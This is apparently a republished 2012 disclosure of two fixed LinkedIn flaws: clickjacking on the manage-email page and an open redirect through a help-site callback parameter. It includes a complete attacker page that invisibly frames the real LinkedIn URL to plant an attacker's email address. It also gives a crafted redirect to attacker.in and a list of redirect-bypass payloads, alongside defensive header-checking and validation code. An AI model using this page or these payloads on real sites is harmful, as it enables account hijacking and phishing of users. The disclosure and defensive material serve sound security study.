Linkedin's Clickjacking & Open Url Redirection Vulnerabilities

    # Vulnerability Title: Secondary Email Addition & Deletion Via Click Jacking in Linkedin
    # Website Link: [Tried on Indian version]
    # Found on: 06/08/2012
    # Author: Ajay Singh Negi
    # Version: [All language versions would be vulnerable]
    # Tested on: [Indian version]
    # Reported On: 07/08/2012
    # Status: Fixed
    # Patched On: 10/09/2012
    # Public Release: 15/09/2012



    Summary


    A clickjacking vulnerability existed on Linkedin that allowed an attacker to add or delete a secondary email address, or to make an existing secondary email address the primary one, by redressing the manage-email page inside a frame on an attacker-controlled site.


    Details


    Linkedin's manage-email page (a single page) was served without an X-Frame-Options header and without any frame-busting JavaScript, so nothing prevented another site from loading it in a frame. The page could therefore be redressed to 'click-jack' Linkedin users. The vulnerable URL and the proof-of-concept screenshots follow.




    1. Click Jacking Vulnerable Url:
    https://www.linkedin.com/settings/manage-email?goback=.nas_*1_*1_*1




    Click Jacking Vulnerability POC Screenshots:








    The redressed manage-email page with the frame's opacity set to 0, so it is invisible to the user. When the user drags the computer into the trash bin and clicks the Go button, a new secondary email address is added to the Linkedin user's account.










    With the frame's opacity set to 0.5, the redressed page and the whole background are clearly visible. The computer is actually a text area containing the attacker's email address, which is selected by default behind the computer image (using JavaScript). When the Linkedin user drags the computer, he actually drags the attacker's email address into the "add secondary email address" field, and when he clicks the Go button he actually clicks the framed "add email address" button, so the attacker's email address is added to the Linkedin user's account.
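    The attacker-side page for the drag-and-drop redressing described above, as an added example (it is not the original PoC from the post). It frames the manage-email URL on top of a fake "tidy the desk" game: the "computer" is a draggable element whose payload is the attacker's address, the trash bin is a decoy positioned where the framed "add email" box sits, and the Go button is a decoy positioned under the framed add button. The mailbox attacker@attacker.in, the decoy layout and the frame offsets are assumptions and have to be tuned against the real page layout.

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Tidy the desk!</title>
<style>
  #game     { position: relative; width: 960px; height: 540px; font-family: sans-serif; }
  /* Decoys the victim sees. They sit BENEATH the frame and show through it. */
  #computer { position: absolute; left: 40px; top: 220px; padding: 8px;
              border: 2px solid #555; cursor: grab; user-select: text; }
  #computer .payload { color: transparent; }   /* the address is there, just not visible */
  #trash    { position: absolute; left: 520px; top: 236px; width: 220px; height: 36px;
              border: 2px dashed #c00; }
  #go       { position: absolute; left: 760px; top: 240px; font-size: 18px; }
  /* The framed LinkedIn page sits ON TOP of the decoys. opacity:0 hides it while it
     still receives the drop and the click; 0.5 shows the alignment while building the
     page. It starts at x=300 so the drag source is not covered. The offsets are
     ASSUMED and must be tuned so the "add email" box lands on #trash and the add
     button on #go. */
  #target   { position: absolute; left: 300px; top: -200px; width: 1000px; height: 800px;
              border: 0; opacity: 0; z-index: 10; }
</style>
</head>
<body>
<div id="game">
  <p>Drag the old computer into the recycling bin, then press Go.</p>
  <div id="computer" draggable="true">&#128187;<span class="payload">attacker@attacker.in</span></div>
  <div id="trash"></div>
  <button id="go">Go</button>
  <iframe id="target" scrolling="no"
          src="https://www.linkedin.com/settings/manage-email?goback=.nas_*1_*1_*1"></iframe>
</div>
<script>
  // Added example, not the original PoC. Mailbox, decoys and offsets are assumptions.
  var ATTACKER_EMAIL = "attacker@attacker.in";   // hypothetical attacker mailbox
  var computer = document.getElementById("computer");

  // HTML5 drag and drop: the payload dropped into the framed <input> is plain text,
  // so the "computer" carries the attacker's address rather than an image.
  computer.addEventListener("dragstart", function (e) {
    e.dataTransfer.setData("text/plain", ATTACKER_EMAIL);
    e.dataTransfer.effectAllowed = "copy";
  });

  // Fallback for browsers that only drag a text selection: keep the address selected,
  // so grabbing the "computer" drags the selected text (the trick the post describes).
  function keepSelected() {
    var range = document.createRange();
    range.selectNodeContents(computer.querySelector(".payload"));
    var sel = window.getSelection();
    sel.removeAllRanges();
    sel.addRange(range);
  }
  keepSelected();
  computer.addEventListener("mouseenter", keepSelected);

  // #go is a pure decoy. The transparent frame above it swallows the click, which
  // lands on the real "add email address" button in the framed page, so this
  // handler never runs while the frame is in place.
  document.getElementById("go").addEventListener("click", function () {
    this.textContent = "Done!";
  });
</script>
</body>
</html>
```

    Set `opacity: 0.5` on `#target` while lining the decoys up, then drop it back to 0. The page only does anything against a target that can be framed: once the target sends X-Frame-Options: SAMEORIGIN (the fix the post reports), the frame renders nothing and the drop and the click land on an empty frame.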










    Secondary email address added successfully to the Linkedin user's account.












    No X-Frame-Options in the server's response headers.


    Linkedin addressed the vulnerability by adding an X-Frame-Options header set to SAMEORIGIN on this page, so the page now renders in a frame only when the framing document is on the same origin.
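    The check a tester would run against every sensitive page, as an added example (not LinkedIn's code): given a response's headers, decide whether a browser will render the page inside a frame hosted on a given origin. It evaluates CSP frame-ancestors first, because browsers that support it apply it instead of X-Frame-Options, and then X-Frame-Options. The two header sets are constructed to mirror the before and after state the post describes; the attacker origin is hypothetical.

```javascript
// Added example (not LinkedIn's code): frameability decision from response headers.

function parseCsp(value) {
  // "default-src 'self'; frame-ancestors 'self' https://*.example.com" -> Map(name -> tokens)
  const directives = new Map();
  for (const part of value.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1)); // duplicates: first wins
  }
  return directives;
}

function originMatches(source, origin) {
  // Simplified frame-ancestors host-source matching: scheme, host (optional *. wildcard)
  // and explicit port. Path components of a source are not considered.
  const o = new URL(origin);
  const s = source.toLowerCase();
  if (s === "*") return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return o.protocol === s;   // scheme-source, e.g. "https:"
  const withScheme = s.includes("://") ? s : `${o.protocol}//${s}`;
  const wildcard = withScheme.includes("://*.");
  let u;
  try { u = new URL(withScheme.replace("://*.", "://")); } catch { return false; }
  if (u.protocol !== o.protocol || u.port !== o.port) return false;
  return wildcard ? o.hostname.endsWith("." + u.hostname) : o.hostname === u.hostname;
}

function frameDecision(headers, topOrigin, targetOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  // Browsers that understand frame-ancestors apply it INSTEAD of X-Frame-Options.
  if (h["content-security-policy"]) {
    const fa = parseCsp(h["content-security-policy"]).get("frame-ancestors");
    if (fa) {
      const ok = fa.some((src) =>
        src.toLowerCase() === "'self'" ? topOrigin === targetOrigin
        : src.toLowerCase() === "'none'" ? false
        : originMatches(src, topOrigin));
      return { allowed: ok, by: "Content-Security-Policy frame-ancestors" };
    }
  }

  const xfo = h["x-frame-options"];
  if (xfo === undefined) return { allowed: true, by: "no X-Frame-Options header: page is frameable" };
  switch (xfo.trim().toUpperCase().split(/\s+/)[0]) {
    case "DENY":       return { allowed: false, by: "X-Frame-Options: DENY" };
    case "SAMEORIGIN": return { allowed: topOrigin === targetOrigin, by: "X-Frame-Options: SAMEORIGIN" };
    default:
      // ALLOW-FROM was never supported by Chrome or Safari and was dropped by Firefox;
      // an unrecognised value is ignored, which leaves the page frameable.
      return { allowed: true, by: `X-Frame-Options value "${xfo}" is ignored by browsers` };
  }
}

// Constructed samples mirroring the post: no header before the fix, SAMEORIGIN after it.
const BEFORE_FIX = { "Content-Type": "text/html; charset=utf-8" };
const AFTER_FIX  = { "Content-Type": "text/html; charset=utf-8", "X-Frame-Options": "SAMEORIGIN" };
const TARGET   = "https://www.linkedin.com";
const ATTACKER = "http://attacker.in";   // hypothetical attacker origin

console.log("before fix, framed by attacker:", frameDecision(BEFORE_FIX, ATTACKER, TARGET));
console.log("after fix,  framed by attacker:", frameDecision(AFTER_FIX, ATTACKER, TARGET));
console.log("after fix,  framed by itself:  ", frameDecision(AFTER_FIX, TARGET, TARGET));
```

    Feed it the headers from `curl -sI` of the page under test; a result of `allowed: true` for an origin you do not control means the page can still be redressed.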






    # Vulnerability Title: Open Url Redirection in Linkedin
    # Website Link: [Tried on Indian version]
    # Found on: 05/08/2012
    # Author: Ajay Singh Negi
    # Version: [All language versions would be vulnerable]
    # Tested on: [Indian version]
    # Reported On: 06/08/2012
    # Status: Fixed
    # Patched On: 07/09/2012
    # Public Release: 15/09/2012



    Summary


    An open URL redirection with which an attacker could redirect any Linkedin user to any malicious website. The vulnerable URL and the proof-of-concept video follow.


    Original Open Url Redirection Vulnerable Url:


    https://help.linkedin.com/app/utils/...om_auth%2Ftrue



    Crafted Open Url Redirection Vulnerable Url:
    https://help.linkedin.com/app/utils/log_error/et/0/ec/7/callback/http%3A%2F%2Fattacker.in
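    The crafted URL works because the `callback` value (here the URL-encoded http://attacker.in) is used as the redirect target unchanged. The following added example, which is not LinkedIn's handler, models that parameter in Node: the vulnerable version reflects it into the redirect, the hardened version resolves it against the site's own origin and follows it only when the resulting origin is on an allowlist. The site origin, the allowlist and the sample inputs are assumptions; the first sample is the post's payload in decoded form.

```javascript
// Added example (not LinkedIn's code): validating a redirect "callback" parameter.

const SITE_ORIGIN = "https://help.linkedin.com";                        // assumed
const ALLOWED_ORIGINS = new Set(["https://help.linkedin.com",
                                 "https://www.linkedin.com"]);          // assumed allowlist
const FALLBACK = SITE_ORIGIN + "/";

// Vulnerable pattern: the parameter is the redirect target, whatever it says.
function vulnerableRedirectTarget(callback) {
  return callback;
}

// Hardened pattern: resolve, then compare the resulting origin to an allowlist.
function safeRedirectTarget(callback) {
  let url;
  try {
    // Resolving against SITE_ORIGIN keeps legitimate relative paths working and
    // normalises the host-smuggling variants ("//attacker.in", "/\attacker.in")
    // into absolute URLs whose origin can be inspected.
    url = new URL(callback, SITE_ORIGIN);
  } catch {
    return FALLBACK;
  }
  // url.origin carries scheme, host and port; it is "null" for javascript: and data:,
  // so one exact-match lookup covers scheme downgrades, foreign hosts and odd ports.
  if (!ALLOWED_ORIGINS.has(url.origin)) return FALLBACK;
  if (url.username || url.password) return FALLBACK;   // https://user@www.linkedin.com/
  return url.href;
}

// Constructed inputs: the post's payload plus common bypass variants and two legitimate values.
const SAMPLES = [
  "http://attacker.in",                        // the post's payload, decoded
  "//attacker.in",                             // protocol-relative
  "/\\attacker.in",                            // backslash, normalised to // by browsers
  "https://help.linkedin.com@attacker.in/",    // userinfo trick
  "https://www.linkedin.com.attacker.in/",     // suffix trick
  "javascript:alert(document.domain)",         // non-http scheme
  "/app/home",                                 // legitimate relative path (assumed)
  "https://www.linkedin.com/home?trk=x",       // legitimate absolute URL (assumed)
];

for (const s of SAMPLES) {
  console.log(`${s.padEnd(42)} vulnerable -> ${vulnerableRedirectTarget(s)}`);
  console.log(`${"".padEnd(42)} hardened   -> ${safeRedirectTarget(s)}`);
}
```

    Matching on `url.origin` rather than on a substring of the URL is the point: string checks such as "starts with https://help.linkedin.com" are exactly what the userinfo and suffix variants are built to pass.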



    Open Url Redirection Vulnerability POC Video:





    Special Thanks to AMol NAik and all G4H members.
    This article was originally published in forum thread: Linkedin's Clickjacking & Open Url Redirection Vulnerabilities started by ajaysinghnegi